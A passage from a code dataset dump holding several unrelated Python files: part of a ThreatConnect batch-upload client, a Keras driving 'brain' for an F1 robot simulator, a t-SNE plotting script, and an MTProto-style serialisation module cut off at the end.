code-block:: javascript\n\n {\n \"status\": \"Success\",\n \"data\": {\n \"batchStatus\": {\n \"id\":3505,\n \"status\":\"Completed\",\n \"errorCount\":0,\n \"successCount\":0,\n \"unprocessCount\":0\n }\n }\n }\n\n Args:\n batch_id (str): The ID returned from the ThreatConnect API for the current batch job.\n retry_seconds (int): The base number of seconds used for retries when job is not\n completed.\n back_off (float): A multiplier to use for backing off on each poll attempt when job has\n not completed.\n timeout (int, optional): The number of seconds before the poll should timeout.\n halt_on_error (bool, default:True): If True any exception will raise an error.\n\n Returns:\n dict: The batch status returned from the ThreatConnect API.\n \"\"\"\n # check global setting for override\n if self.halt_on_poll_error is not None:\n halt_on_error = self.halt_on_poll_error\n\n # initial poll interval\n if self._poll_interval is None and self._batch_data_count is not None:\n # calculate poll_interval base off the number of entries in the batch data\n # with a minimum value of 5 seconds.\n self._poll_interval = max(math.ceil(self._batch_data_count / 300), 5)\n elif self._poll_interval is None:\n # if not able to calculate poll_interval default to 15 seconds\n self._poll_interval = 15\n\n # poll retry back_off factor\n if back_off is None:\n poll_interval_back_off = 2.5\n else:\n poll_interval_back_off = float(back_off)\n\n # poll retry seconds\n if retry_seconds is None:\n poll_retry_seconds = 5\n else:\n poll_retry_seconds = int(retry_seconds)\n\n # poll timeout\n if timeout is None:\n timeout = self.poll_timeout\n else:\n timeout = int(timeout)\n params = {'includeAdditional': 'true'}\n\n poll_count = 0\n poll_time_total = 0\n data = {}\n while True:\n poll_count += 1\n poll_time_total += self._poll_interval\n time.sleep(self._poll_interval)\n self.tcex.log.info(f'Batch poll time: {poll_time_total} seconds')\n try:\n # retrieve job status\n r = self.tcex.session.get(f'/v2/batch/{batch_id}', params=params)\n if not r.ok or 'application/json' not in r.headers.get('content-type', ''):\n self.tcex.handle_error(545, [r.status_code, r.text], halt_on_error)\n return data\n data = r.json()\n if data.get('status') != 'Success':\n self.tcex.handle_error(545, [r.status_code, r.text], halt_on_error)\n except Exception as e:\n self.tcex.handle_error(540, [e], halt_on_error)\n\n if data.get('data', {}).get('batchStatus', {}).get('status') == 'Completed':\n # store last 5 poll times to use in calculating average poll time\n modifier = poll_time_total * 0.7\n self._poll_interval_times = self._poll_interval_times[-4:] + [modifier]\n\n weights = [1]\n poll_interval_time_weighted_sum = 0\n for poll_interval_time in self._poll_interval_times:\n poll_interval_time_weighted_sum += poll_interval_time * weights[-1]\n # weights will be [1, 1.5, 2.25, 3.375, 5.0625] for all 5 poll times depending\n # on how many poll times are available.\n weights.append(weights[-1] * 1.5)\n\n # pop off the last weight so its not added in to the sum\n weights.pop()\n\n # calculate the weighted average of the last 5 poll times\n self._poll_interval = math.floor(poll_interval_time_weighted_sum / sum(weights))\n\n if poll_count == 1:\n # if completed on first poll, reduce poll interval.\n self._poll_interval = self._poll_interval * 0.85\n\n self.tcex.log.debug(f'Batch Status: {data}')\n return data\n\n # update poll_interval for retry with max poll time of 20 seconds\n self._poll_interval = min(\n poll_retry_seconds + int(poll_count * 
poll_interval_back_off), 20\n )\n\n # time out poll to prevent App running indefinitely\n if poll_time_total >= timeout:\n self.tcex.handle_error(550, [timeout], True)\n\n @property\n def poll_timeout(self):\n \"\"\"Return current poll timeout value.\"\"\"\n return self._poll_timeout\n\n @poll_timeout.setter\n def poll_timeout(self, seconds):\n \"\"\"Set the poll timeout value.\"\"\"\n self._poll_timeout = int(seconds)\n\n def registry_key(self, key_name, value_name, value_type, **kwargs):\n \"\"\"Add Registry Key data to Batch object.\n\n Args:\n key_name (str): The key_name value for this Indicator.\n value_name (str): The value_name value for this Indicator.\n value_type (str): The value_type value for this Indicator.\n confidence (str, kwargs): The threat confidence for this Indicator.\n date_added (str, kwargs): The date timestamp the Indicator was created.\n last_modified (str, kwargs): The date timestamp the Indicator was last modified.\n rating (str, kwargs): The threat rating for this Indicator.\n xid (str, kwargs): The external id for this Indicator.\n\n Returns:\n obj: An instance of Registry Key.\n \"\"\"\n indicator_obj = RegistryKey(key_name, value_name, value_type, **kwargs)\n return self._indicator(indicator_obj)\n\n def report(self, name, **kwargs):\n \"\"\"Add Report data to Batch object.\n\n Args:\n name (str): The name for this Group.\n file_name (str): The name for the attached file for this Group.\n date_added (str, kwargs): The date timestamp the Indicator was created.\n file_content (str;method, kwargs): The file contents or callback method to retrieve\n file content.\n publish_date (str, kwargs): The publish datetime expression for this Group.\n xid (str, kwargs): The external id for this Group.\n\n Returns:\n obj: An instance of Report.\n \"\"\"\n group_obj = Report(name, **kwargs)\n return self._group(group_obj)\n\n def save(self, resource):\n \"\"\"Save group|indicator dict or object to shelve.\n\n Best effort to save group/indicator data to disk. 
If for any reason the save fails\n the data will still be accessible from the list in memory.\n\n Args:\n resource (dict|obj): The Group or Indicator dict or object.\n \"\"\"\n resource_type = None\n xid = None\n if isinstance(resource, dict):\n resource_type = resource.get('type')\n xid = resource.get('xid')\n else:\n resource_type = resource.type\n xid = resource.xid\n\n if resource_type is not None and xid is not None:\n saved = True\n if resource_type in self.tcex.group_types:\n try:\n # groups\n self.groups_shelf[xid] = resource\n except Exception:\n saved = False\n\n if saved:\n try:\n del self._groups[xid]\n except KeyError:\n # if group was saved twice it would already be deleted\n pass\n elif resource_type in self.tcex.indicator_types_data.keys():\n try:\n # indicators\n self.indicators_shelf[xid] = resource\n except Exception:\n saved = False\n\n if saved:\n try:\n del self._indicators[xid]\n except KeyError:\n # if indicator was saved twice it would already be deleted\n pass\n\n @property\n def saved_groups(self):\n \"\"\"Return True if saved group files exist, else False.\"\"\"\n if self._saved_groups is None:\n self._saved_groups = False\n fqfn_saved = os.path.join(self.tcex.args.tc_temp_path, 'groups-saved')\n if (\n self.enable_saved_file\n and os.path.isfile(fqfn_saved)\n and os.access(fqfn_saved, os.R_OK)\n ):\n self._saved_groups = True\n self.tcex.log.debug('groups-saved file found')\n return self._saved_groups\n\n @property\n def saved_indicators(self):\n \"\"\"Return True if saved indicators files exist, else False.\"\"\"\n if self._saved_indicators is None:\n self._saved_indicators = False\n fqfn_saved = os.path.join(self.tcex.args.tc_temp_path, 'indicators-saved')\n if (\n self.enable_saved_file\n and os.path.isfile(fqfn_saved)\n and os.access(fqfn_saved, os.R_OK)\n ):\n self._saved_indicators = True\n self.tcex.log.debug('indicators-saved file found')\n return self._saved_indicators\n\n @property\n def saved_xids(self):\n \"\"\"Return previously saved xids.\"\"\"\n if self._saved_xids is None:\n self._saved_xids = []\n if self.debug:\n fpfn = os.path.join(self.tcex.args.tc_temp_path, 'xids-saved')\n if os.path.isfile(fpfn) and os.access(fpfn, os.R_OK):\n with open(fpfn) as fh:\n self._saved_xids = fh.read().splitlines()\n return self._saved_xids\n\n @property\n def settings(self):\n \"\"\"Return batch job settings.\"\"\"\n _settings = {\n 'action': self._action,\n # not supported in v2 batch\n # 'attributeWriteType': self._attribute_write_type,\n 'attributeWriteType': 'Replace',\n 'haltOnError': str(self._halt_on_error).lower(),\n 'owner': self._owner,\n 'version': 'V2',\n }\n if self._playbook_triggers_enabled is not None:\n _settings['playbookTriggersEnabled'] = str(self._playbook_triggers_enabled).lower()\n if self._hash_collision_mode is not None:\n _settings['hashCollisionMode'] = self._hash_collision_mode\n if self._file_merge_mode is not None:\n _settings['fileMergeMode'] = self._file_merge_mode\n return _settings\n\n def signature(self, name, file_name, file_type, file_text, **kwargs):\n \"\"\"Add Signature data to Batch object.\n\n Valid file_types:\n + Snort ®\n + Suricata\n + YARA\n + ClamAV ®\n + OpenIOC\n + CybOX ™\n + Bro\n + Regex\n + SPL - Splunk ® Search Processing Language\n\n Args:\n name (str): The name for this Group.\n file_name (str): The name for the attached signature for this Group.\n file_type (str): The signature type for this Group.\n file_text (str): The signature content for this Group.\n date_added (str, kwargs): The date timestamp the 
Indicator was created.\n xid (str, kwargs): The external id for this Group.\n\n Returns:\n obj: An instance of Signature.\n \"\"\"\n group_obj = Signature(name, file_name, file_type, file_text, **kwargs)\n return self._group(group_obj)\n\n def submit(self, poll=True, errors=True, process_files=True, halt_on_error=True):\n \"\"\"Submit Batch request to ThreatConnect API.\n\n By default this method will submit the job request and data and if the size of the data\n is below the value **synchronousBatchSaveLimit** set in System Setting it will process\n the request synchronously and return the batch status. If the size of the batch is greater\n than the value set the batch job will be queued.\n Errors are not retrieved automatically and need to be enabled.\n\n If any of the submit, poll, or error methods fail the entire submit will halt at the point\n of failure. The behavior can be changed by setting halt_on_error to False.\n\n Each of these methods can also be called on their own for greater control of the submit\n process.\n\n Args:\n poll (bool, default:True): Poll for status.\n errors (bool, default:True): Retrieve any batch errors (only if poll is True).\n process_files (bool, default:True): Send any document or report attachments to the API.\n halt_on_error (bool, default:True): If True any exception will raise an error.\n\n Returns:\n dict: The Batch Status from the ThreatConnect API.\n \"\"\"\n batch_data = (\n self.submit_create_and_upload(halt_on_error).get('data', {}).get('batchStatus', {})\n )\n batch_id = batch_data.get('id')\n if batch_id is not None:\n self.tcex.log.info(f'Batch ID: {batch_id}')\n # job hit queue\n if poll:\n # poll for status\n batch_data = (\n self.poll(batch_id, halt_on_error=halt_on_error)\n .get('data', {})\n .get('batchStatus')\n )\n if errors:\n # retrieve errors\n error_groups = batch_data.get('errorGroupCount', 0)\n error_indicators = batch_data.get('errorIndicatorCount', 0)\n if error_groups > 0 or error_indicators > 0:\n self.tcex.log.debug('retrieving batch errors')\n batch_data['errors'] = self.errors(batch_id)\n else:\n # can't process files if status is unknown (polling must be enabled)\n process_files = False\n\n if process_files:\n # submit file data after batch job is complete\n batch_data['uploadStatus'] = self.submit_files(halt_on_error)\n return batch_data\n\n def submit_all(self, poll=True, errors=True, process_files=True, halt_on_error=True):\n \"\"\"Submit Batch request to ThreatConnect API.\n\n By default this method will submit the job request and data and if the size of the data\n is below the value **synchronousBatchSaveLimit** set in System Setting it will process\n the request synchronously and return the batch status. If the size of the batch is greater\n than the value set the batch job will be queued.\n Errors are not retrieved automatically and need to be enabled.\n\n If any of the submit, poll, or error methods fail the entire submit will halt at the point\n of failure. 
The behavior can be changed by setting halt_on_error to False.\n\n Each of these methods can also be called on their own for greater control of the submit\n process.\n\n Args:\n poll (bool, default:True): Poll for status.\n errors (bool, default:True): Retrieve any batch errors (only if poll is True).\n process_files (bool, default:True): Send any document or report attachments to the API.\n halt_on_error (bool, default:True): If True any exception will raise an error.\n\n Returns:\n dict: The Batch Status from the ThreatConnect API.\n \"\"\"\n batch_data_array = []\n while True:\n batch_data = {}\n batch_id = None\n if self.action.lower() == 'delete':\n # while waiting on a FR for delete support in createAndUpload, submit the delete request\n # the old way (submit job + submit data), still using V2.\n if len(self) > 0: # pylint: disable=len-as-condition\n batch_id = self.submit_job(halt_on_error)\n if batch_id is not None:\n batch_data = self.submit_data(batch_id, halt_on_error)\n else:\n batch_data = {}\n else:\n batch_data = (\n self.submit_create_and_upload(halt_on_error)\n .get('data', {})\n .get('batchStatus', {})\n )\n batch_id = batch_data.get('id')\n\n # break loop when end of data is reached\n if not batch_data:\n break\n\n if batch_id is not None:\n self.tcex.log.info(f'Batch ID: {batch_id}')\n # job hit queue\n if poll:\n # poll for status\n batch_data = (\n self.poll(batch_id, halt_on_error=halt_on_error)\n .get('data', {})\n .get('batchStatus')\n )\n if errors:\n # retrieve errors\n error_count = batch_data.get('errorCount', 0)\n error_groups = batch_data.get('errorGroupCount', 0)\n error_indicators = batch_data.get('errorIndicatorCount', 0)\n if error_count > 0 or error_groups > 0 or error_indicators > 0:\n self.tcex.log.debug('retrieving batch errors')\n batch_data['errors'] = self.errors(batch_id)\n else:\n # can't process files if status is unknown (polling must be enabled)\n process_files = False\n\n if process_files:\n # submit file data after batch job is complete\n batch_data['uploadStatus'] = self.submit_files(halt_on_error)\n batch_data_array.append(batch_data)\n\n if self.debug:\n self.write_error_json(batch_data.get('errors'))\n\n return batch_data_array\n\n def write_error_json(self, errors: list):\n \"\"\"Write the errors to a JSON file for debugging purposes.\n\n Args:\n errors (list): A list of errors to write out.\n \"\"\"\n if not errors:\n errors = []\n timestamp = str(time.time()).replace('.', '')\n error_json_file = os.path.join(self.tcex.args.tc_temp_path, f'errors-{timestamp}.json')\n with open(error_json_file, 'w') as fh:\n json.dump(errors, fh, indent=2)\n\n def submit_create_and_upload(self, halt_on_error=True):\n \"\"\"Submit Batch request to ThreatConnect API.\n\n Returns:\n dict: The Batch Status from the ThreatConnect API.\n \"\"\"\n # check global setting for override\n if self.halt_on_batch_error is not None:\n halt_on_error = self.halt_on_batch_error\n\n content = self.data\n if content.get('group') or content.get('indicator'):\n if self.debug:\n # special code for debugging App using batchV2.\n self.write_batch_json(content)\n\n # store the length of the batch data to use for poll interval calculations\n self.tcex.log.info(f\"Batch Group Size: {len(content.get('group')):,}.\")\n self.tcex.log.info(f\"Batch Indicator Size: {len(content.get('indicator')):,}.\")\n\n try:\n files = (('config', json.dumps(self.settings)), ('content', json.dumps(content)))\n params = {'includeAdditional': 'true'}\n r = self.tcex.session.post('/v2/batch/createAndUpload', 
files=files, params=params)\n self.tcex.log.debug(f'Batch Status Code: {r.status_code}')\n if not r.ok or 'application/json' not in r.headers.get('content-type', ''):\n self.tcex.handle_error(10510, [r.status_code, r.text], halt_on_error)\n return r.json()\n except Exception as e:\n self.tcex.handle_error(10505, [e], halt_on_error)\n return {}\n\n def submit_data(self, batch_id: int, halt_on_error: Optional[bool] = True) -> dict:\n \"\"\"Submit Batch request to ThreatConnect API.\n\n Args:\n batch_id (int): The batch id of the current job.\n halt_on_error (Optional[bool] = True): If True the process should halt if any errors\n are encountered.\n\n Returns:\n dict: The response data\n \"\"\"\n\n # check global setting for override\n if self.halt_on_batch_error is not None:\n halt_on_error = self.halt_on_batch_error\n\n content = self.data\n # store the length of the batch data to use for poll interval calculations\n self._batch_data_count = len(content.get('group')) + len(content.get('indicator'))\n self.tcex.log.info(f'Batch Size: {self._batch_data_count:,}')\n if content.get('group') or content.get('indicator'):\n headers = {'Content-Type': 'application/octet-stream'}\n try:\n r = self.tcex.session.post(f'/v2/batch/{batch_id}', headers=headers, json=content)\n if not r.ok or 'application/json' not in r.headers.get('content-type', ''):\n self.tcex.handle_error(10525, [r.status_code, r.text], halt_on_error)\n return r.json()\n except Exception as e:\n self.tcex.handle_error(10520, [e], halt_on_error)\n return {}\n\n def submit_files(self, halt_on_error=True):\n \"\"\"Submit Files for Documents and Reports to ThreatConnect API.\n\n Critical Errors\n\n * There is insufficient document storage allocated to this account.\n\n Args:\n halt_on_error (bool, default:True): If True any exception will raise an error.\n\n Returns:\n dict: The upload status for each xid.\n \"\"\"\n # check global setting for override\n if self.halt_on_file_error is not None:\n halt_on_error = self.halt_on_file_error\n\n upload_status = []\n for xid, content_data in list(self._files.items()):\n del self._files[xid] # win or lose, remove the entry\n status = True\n\n # used for debug/testing to prevent upload of previously uploaded file\n if self.debug and xid in self.saved_xids:\n self.tcex.log.debug(f'skipping previously saved file {xid}.')\n continue\n\n # process the file content\n content = content_data.get('fileContent')\n if callable(content):\n content = content_data.get('fileContent')(xid)\n if content is None:\n upload_status.append({'uploaded': False, 'xid': xid})\n self.tcex.log.warning(f'File content was null for xid {xid}.')\n continue\n api_branch = 'documents'\n if content_data.get('type') == 'Report':\n api_branch = 'reports'\n\n if self.debug and content_data.get('fileName'):\n # special code for debugging App using batchV2.\n fqfn = os.path.join(\n self.tcex.args.tc_temp_path,\n f'''{api_branch}--{xid}--{content_data.get('fileName').replace('/', ':')}''',\n )\n with open(fqfn, 'wb') as fh:\n fh.write(content)\n\n # Post File\n url = f'/v2/groups/{api_branch}/{xid}/upload'\n headers = {'Content-Type': 'application/octet-stream'}\n params = {'owner': self._owner, 'updateIfExists': 'true'}\n r = self.submit_file_content('POST', url, content, headers, params, halt_on_error)\n if r.status_code == 401:\n # use PUT method if file already exists\n self.tcex.log.info('Received 401 status code using POST. 
Trying PUT to update.')\n r = self.submit_file_content('PUT', url, content, headers, params, halt_on_error)\n self.tcex.log.debug(f\"{content_data.get('type')} Upload URL: {r.url}.\")\n if not r.ok:\n status = False\n self.tcex.handle_error(585, [r.status_code, r.text], halt_on_error)\n elif self.debug:\n self.saved_xids.append(xid)\n self.tcex.log.info(f'Status {r.status_code} for file upload with xid {xid}.')\n upload_status.append({'uploaded': status, 'xid': xid})\n return upload_status\n\n def submit_file_content(self, method, url, data, headers, params, halt_on_error=True):\n \"\"\"Submit File Content for Documents and Reports to ThreatConnect API.\n\n Args:\n method (str): The HTTP method for the request (POST, PUT).\n url (str): The URL for the request.\n data (str;bytes;file): The body (data) for the request.\n headers (dict): The headers for the request.\n params (dict): The query string parameters for the request.\n halt_on_error (bool, default:True): If True any exception will raise an error.\n\n Returns:\n requests.models.Response: The response from the request.\n \"\"\"\n r = None\n try:\n r = self.tcex.session.request(method, url, data=data, headers=headers, params=params)\n except Exception as e:\n self.tcex.handle_error(580, [e], halt_on_error)\n return r\n\n def submit_job(self, halt_on_error=True):\n \"\"\"Submit Batch request to ThreatConnect API.\"\"\"\n # check global setting for override\n if self.halt_on_batch_error is not None:\n halt_on_error = self.halt_on_batch_error\n\n try:\n r = self.tcex.session.post('/v2/batch', json=self.settings)\n except Exception as e:\n self.tcex.handle_error(10505, [e], halt_on_error)\n\n if not r.ok or 'application/json' not in r.headers.get('content-type', ''):\n self.tcex.handle_error(10510, [r.status_code, r.text], halt_on_error)\n data = r.json()\n if data.get('status') != 'Success':\n self.tcex.handle_error(10510, [r.status_code, r.text], halt_on_error)\n self.tcex.log.debug(f'Batch Submit Data: {data}')\n return data.get('data', {}).get('batchId')\n\n def threat(self, name, **kwargs):\n \"\"\"Add Threat data to Batch object\n\n Args:\n name (str): The name for this Group.\n date_added (str, kwargs): The date timestamp the Indicator was created.\n xid (str, kwargs): The external id for this Group.\n\n Returns:\n obj: An instance of Threat.\n \"\"\"\n group_obj = Threat(name, **kwargs)\n return self._group(group_obj)\n\n def user_agent(self, text, **kwargs):\n \"\"\"Add User Agent data to Batch object\n\n Args:\n text (str): The value for this Indicator.\n confidence (str, kwargs): The threat confidence for this Indicator.\n date_added (str, kwargs): The date timestamp the Indicator was created.\n last_modified (str, kwargs): The date timestamp the Indicator was last modified.\n rating (str, kwargs): The threat rating for this Indicator.\n xid (str, kwargs): The external id for this Indicator.\n\n Returns:\n obj: An instance of UserAgent.\n \"\"\"\n indicator_obj = UserAgent(text, **kwargs)\n return self._indicator(indicator_obj)\n\n def url(self, text, **kwargs):\n \"\"\"Add URL Address data to Batch object.\n\n Args:\n text (str): The value for this Indicator.\n confidence (str, kwargs): The threat confidence for this Indicator.\n date_added (str, kwargs): The date timestamp the Indicator was created.\n last_modified (str, kwargs): The date timestamp the Indicator was last modified.\n rating (str, kwargs): The threat rating for this Indicator.\n xid (str, kwargs): The external id for this Indicator.\n\n Returns:\n obj: An 
instance of URL.\n \"\"\"\n indicator_obj = URL(text, **kwargs)\n return self._indicator(indicator_obj)\n\n def write_batch_json(self, content):\n \"\"\"Write batch json data to a file.\"\"\"\n if content:\n timestamp = str(time.time()).replace('.', '')\n batch_json_file = os.path.join(self.tcex.args.tc_temp_path, f'batch-{timestamp}.json')\n with open(batch_json_file, 'w') as fh:\n json.dump(content, fh, indent=2)\n\n @property\n def file_len(self):\n \"\"\"Return the number of current files.\"\"\"\n return len(self._files)\n\n @property\n def group_len(self):\n \"\"\"Return the number of current groups.\"\"\"\n return len(self.groups) + len(self.groups_shelf)\n\n @property\n def indicator_len(self):\n \"\"\"Return the number of current indicators.\"\"\"\n return len(self.indicators) + len(self.indicators_shelf)\n\n def __len__(self):\n \"\"\"Return the number of groups and indicators.\"\"\"\n return self.group_len + self.indicator_len\n\n def __str__(self): # pragma: no cover\n \"\"\"Return string representation of object.\"\"\"\n groups = []\n for group_data in self.groups.values():\n if isinstance(group_data, dict):\n groups.append(group_data)\n else:\n groups.append(group_data.data)\n for group_data in self.groups_shelf.values():\n if isinstance(group_data, dict):\n groups.append(group_data)\n else:\n groups.append(group_data.data)\n\n indicators = []\n for indicator_data in self.indicators.values():\n if isinstance(indicator_data, dict):\n indicators.append(indicator_data)\n else:\n indicators.append(indicator_data.data)\n for indicator_data in self.indicators_shelf.values():\n if isinstance(indicator_data, dict):\n indicators.append(indicator_data)\n else:\n indicators.append(indicator_data.data)\n\n data = {'group': groups, 'indicators': indicators}\n return json.dumps(data, indent=4, sort_keys=True)\n","sub_path":"tcex/batch/batch.py","file_name":"batch.py","file_ext":"py","file_size_in_byte":68429,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"418201559","text":"\"\"\"\r\n Robot: F1\r\n Framework: keras\r\n Number of networks: 2\r\n Network type: Regression\r\n Predictions:\r\n linear speed(v)\r\n angular speed(w)\r\n\r\n This brain uses regression networks based on Keras framework to predict the linear and angular velocity\r\n of the F1 car. For that task it uses two different regression convolutional neural networks, one for v\r\n and another one for w\r\n\"\"\"\r\nfrom behaviorlib.keraslib.keras_predict import KerasPredictor\r\nimport cv2\r\nfrom utils.constants import PRETRAINED_MODELS_DIR, ROOT_PATH\r\n\r\nPRETRAINED_MODELS = ROOT_PATH + '/' + PRETRAINED_MODELS_DIR + '/'\r\n\r\n\r\nclass Brain:\r\n \"\"\"Specific brain for the f1 robot. See header.\"\"\"\r\n\r\n def __init__(self, sensors, actuators, handler=None):\r\n \"\"\"Constructor of the class.\r\n\r\n Arguments:\r\n sensors {robot.sensors.Sensors} -- Sensors instance of the robot\r\n actuators {robot.actuators.Actuators} -- Actuators instance of the robot\r\n\r\n Keyword Arguments:\r\n handler {brains.brain_handler.Brains} -- Handler of the current brain. 
Communication with the controller\r\n (default: {None})\r\n \"\"\"\r\n self.motors = actuators.get_motor('motors_0')\r\n self.camera = sensors.get_camera('camera_0')\r\n self.handler = handler\r\n self.cont = 0\r\n self.net_v = KerasPredictor(PRETRAINED_MODELS + 'model_pilotnet_v.h5')\r\n self.net_w = KerasPredictor(PRETRAINED_MODELS + 'model_pilotnet_w.h5')\r\n\r\n def update_frame(self, frame_id, data):\r\n \"\"\"Update the information to be shown in one of the GUI's frames.\r\n\r\n Arguments:\r\n frame_id {str} -- Id of the frame that will represent the data\r\n data {*} -- Data to be shown in the frame. Depending on the type of frame (rgbimage, laser, pose3d, etc)\r\n \"\"\"\r\n self.handler.update_frame(frame_id, data)\r\n\r\n def execute(self):\r\n \"\"\"Main loop of the brain. This will be called iteratively each TIME_CYCLE (see pilot.py)\"\"\"\r\n\r\n if self.cont > 0:\r\n print(\"Runing...\")\r\n self.cont += 1\r\n\r\n image = self.camera.getImage().data\r\n img = cv2.cvtColor(image, cv2.COLOR_RGB2BGR)\r\n\r\n prediction_v = self.net_v.predict(img, type='regression')\r\n prediction_w = self.net_w.predict(img, type='regression')\r\n\r\n if prediction_w != '' and prediction_w != '':\r\n self.motors.sendV(prediction_v)\r\n self.motors.sendW(prediction_w)\r\n\r\n self.update_frame('frame_0', image)\r\n","sub_path":"behavior_studio/brains/f1/brain_f1_keras_regression.py","file_name":"brain_f1_keras_regression.py","file_ext":"py","file_size_in_byte":2550,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"327223321","text":"import argparse\nimport cPickle\nfrom sklearn.manifold import TSNE\nfrom matplotlib import pyplot as plt\n\ndef main():\n args = argparse.ArgumentParser()\n args.add_argument('--pkl', type=str, required=True)\n args.add_argument('--iter', type=int, default=5000)\n FLAGS = args.parse_args()\n\n with open(FLAGS.pkl, 'rb') as pkl:\n feats = cPickle.load(pkl)\n\n manifold = TSNE(n_iter=FLAGS.iter, init='pca', random_state=0)\n emb = manifold.fit_transform(feats)\n c = range(len(emb))\n\n sc = plt.scatter(emb[:, 0], emb[:, 1], c=c, cmap=plt.cm.get_cmap('RdYlBu'))\n plt.colorbar(sc)\n plt.show()\n\nif __name__ == '__main__':\n main()","sub_path":"tsne_vis.py","file_name":"tsne_vis.py","file_ext":"py","file_size_in_byte":655,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"32148284","text":"# -*- coding: utf8 -*-\r\nimport logging\r\nimport struct\r\n\r\ndef Int(size=32):\r\n assert(size % 8 == 0)\r\n size //= 8\r\n class int_cl:\r\n @classmethod\r\n def Parse(cls, data, offset=0):\r\n return (int.from_bytes(data[offset:offset+size], 'little'), size)\r\n \r\n @classmethod\r\n def Dump(cls, value):\r\n return value.to_bytes(size, 'little')\r\n return int_cl\r\n\r\nclass Long(Int(64)):\r\n pass\r\n\r\nclass String:\r\n @classmethod\r\n def Parse(cls, data, offset=0):\r\n ln = int.from_bytes(data[offset:offset+1], 'little')\r\n if ln == 254:\r\n ln = int.from_bytes(data[offset+1:offset+4], 'little')\r\n return (data[offset+4:offset+4+ln], (((ln+4)-1)//4+1)*4)\r\n else:\r\n return (data[offset+1:offset+1+ln], (((ln+1)-1)//4+1)*4)\r\n \r\n @classmethod\r\n def Dump(cls, value):\r\n if len(value) <= 253:\r\n return len(value).to_bytes(1, 'little') + value + b'\\0' * (3 - len(value) % 4)\r\n return b'\\xfe' + len(value).to_bytes(3, 'little') + value + b'\\0' * (3 - (len(value)+3) % 4)\r\n \r\ndef BigInt(size):\r\n assert(size % 8 == 0)\r\n size //= 8\r\n class 
big_int_cl(String):\r\n @classmethod\r\n def Parse(cls, data, offset=0):\r\n result, ln = super().Parse(data, offset)\r\n return (int.from_bytes(result, 'big'), ln)\r\n \r\n @classmethod\r\n def Dump(cls, value):\r\n return super().Dump(value.to_bytes(size, 'big'))\r\n \r\n return big_int_cl\r\n\r\nclass Double:\r\n @classmethod\r\n def Parse(cls, data, offset=0):\r\n return (struct.unpack_from('d', data, offset)[0], 8)\r\n \r\n @classmethod\r\n def Dump(cls, value):\r\n return struct.pack('d', value)\r\n\r\ndef Tuple(*class_arg):\r\n class tuple_cl:\r\n @classmethod\r\n def Parse(cls, data, offset=0):\r\n result = []\r\n reslen = 0\r\n for t in class_arg:\r\n dt, ln = t.Parse(data, offset+reslen)\r\n result.append(dt)\r\n reslen += ln\r\n return (tuple(result), reslen)\r\n \r\n @classmethod\r\n def Dump(cls, *values):\r\n if len(values) == 1 and isinstance(values[0], tuple):\r\n return cls.Dump(*values[0])\r\n result = b''\r\n for arg, value in zip(class_arg, values):\r\n result += arg.Dump(value)\r\n return result\r\n \r\n return tuple_cl\r\n\r\ndef Vector(tipe):\r\n class vector_cl:\r\n @classmethod\r\n def Parse(cls, data, offset=0):\r\n result = []\r\n reslen = 0\r\n _, ln = Int().Parse(data, offset) # 0x1cb5c415\r\n reslen += ln\r\n count, ln = Int().Parse(data, offset+reslen)\r\n reslen += ln\r\n for _ in range(count):\r\n dt, ln = tipe.Parse(data, offset+reslen)\r\n result.append(dt)\r\n reslen += ln\r\n return (tuple(result), reslen)\r\n \r\n @classmethod\r\n def Dump(cls, value):\r\n # write the vector header (0x1cb5c415) and element count to mirror Parse above\r\n result = Int().Dump(0x1cb5c415) + Int().Dump(len(value))\r\n for val in value:\r\n result += tipe.Dump(val)\r\n return result\r\n \r\n return vector_cl\r\n\r\nStructById = {}\r\nStructByName = {}\r\n\r\ndef Register(name, hash, *args):\r\n class struct_cl(Tuple(Int(), *args)):\r\n @classmethod\r\n def Name(cls):\r\n return name\r\n \r\n @classmethod\r\n def Hash(cls):\r\n return hash\r\n \r\n @classmethod\r\n def Create(cls, *args):\r\n # TODO: add type checking?\r\n return (hash,) + args\r\n\r\n StructById[hash] = struct_cl\r\n StructByName[name] = struct_cl\r\n globals()[name] = struct_cl\r\n\r\nclass Unknown:\r\n @classmethod\r\n def Parse(cls, data, offset=0):\r\n tipe, _ = Int().Parse(data, offset)\r\n return StructById[tipe].Parse(data, offset)\r\n \r\n @classmethod\r\n def Dump(cls, *values):\r\n if len(values) == 1 and isinstance(values[0], tuple):\r\n return cls.Dump(*values[0])\r\n return StructById[values[0]].Dump(*values)\r\n\r\nRegister('resPQ', 0x05162463, Int(128), Int(128), BigInt(64), Vector(Long))\r\nRegister('server_DH_params_fail', 0x79cb045d, Int(128), Int(128), Int(128)) \r\nRegister('server_DH_params_ok', 0xd0e8075c, Int(128), Int(128), String)\r\nRegister('server_DH_inner_data', 0xb5890dba, Int(128), Int(128), Int(), BigInt(2048), BigInt(2048), Int()) \r\nRegister('dh_gen_ok', 0x3bcbf734, Int(128), Int(128), Int(128))\r\nRegister('dh_gen_retry', 0x46dc1fb9, Int(128), Int(128), Int(128))\r\nRegister('dh_gen_fail', 0xa69dae02, Int(128), Int(128), Int(128))\r\nRegister('req_pq', 0x60469778, Int(128))\r\nRegister('p_q_inner_data', 0x83c95aec, BigInt(64), BigInt(32), BigInt(32), Int(128), Int(128), Int(256))\r\nRegister('req_DH_params', 0xd712e4be, Int(128), Int(128), BigInt(32), BigInt(32), Long, String)\r\nRegister('rsa_public_key', 0x7a19cb76, BigInt(2048), BigInt(32))\r\nRegister('set_client_DH_params', 0xf5045f1f, Int(128), Int(128), String)\r\nRegister('client_DH_inner_data', 0x6643b654, Int(128), Int(128), Long, BigInt(2048))\r\n\r\nif __name__ == \"__main__\":\r\n Register(\"test_struct\", 0x12345678, Int(), Int())\r\n\r\n 
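# Illustrative round-trip check added for clarity (not in the original file):\r\n # String.Dump pads to a 4-byte boundary and String.Parse returns the value\r\n # plus the padded length it consumed, so a dump followed by a parse is lossless.\r\n s = String.Dump(b'abc')\r\n assert s == b'\\x03abc'\r\n assert String.Parse(s) == (b'abc', 4)\r\n\r\n 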
